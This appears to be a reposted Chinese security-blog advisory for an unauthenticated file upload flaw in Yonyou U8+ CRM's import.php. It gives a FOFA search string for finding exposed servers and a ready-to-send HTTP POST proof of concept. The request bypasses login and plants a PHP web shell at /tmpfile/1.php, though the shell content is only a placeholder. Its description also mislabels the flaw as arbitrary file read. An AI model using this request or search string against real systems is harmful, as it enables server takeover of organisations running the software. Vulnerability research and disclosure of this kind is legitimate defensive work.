用友U8+ CRM存在import.php文件上传漏洞

admin 2024年7月23日16:00:27评论46 views字数 725阅读2分25秒阅读模式
 

1
漏洞描述
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。用友crm import.php接口存在任意文件读取漏洞。

2
漏洞复现
首页

用友U8+ CRM存在import.php文件上传漏洞

bp发包

用友U8+ CRM存在import.php文件上传漏洞

链接地址:地址/tmpfile/1.php

3
网络测绘
app="用友U8CRM"

4
漏洞POC
POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1
Host: 地址
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryB9S6D2q4J3f7Y1Z5
Content-Length: 257

------WebKitFormBoundaryB9S6D2q4J3f7Y1Z5
Content-Disposition: form-data; name="xfile"; filename="1.xls"

木马内容
------WebKitFormBoundaryB9S6D2q4J3f7Y1Z5
Content-Disposition: form-data; name="combo"

1.php
------WebKitFormBoundaryB9S6D2q4J3f7Y1Z5--
 

原文始发于微信公众号(我吃饼干):【漏洞复现】用友U8+ CRM存在import.php文件上传漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月23日16:00:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友U8+ CRM存在import.php文件上传漏洞http://cn-sec.com/archives/2989894.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息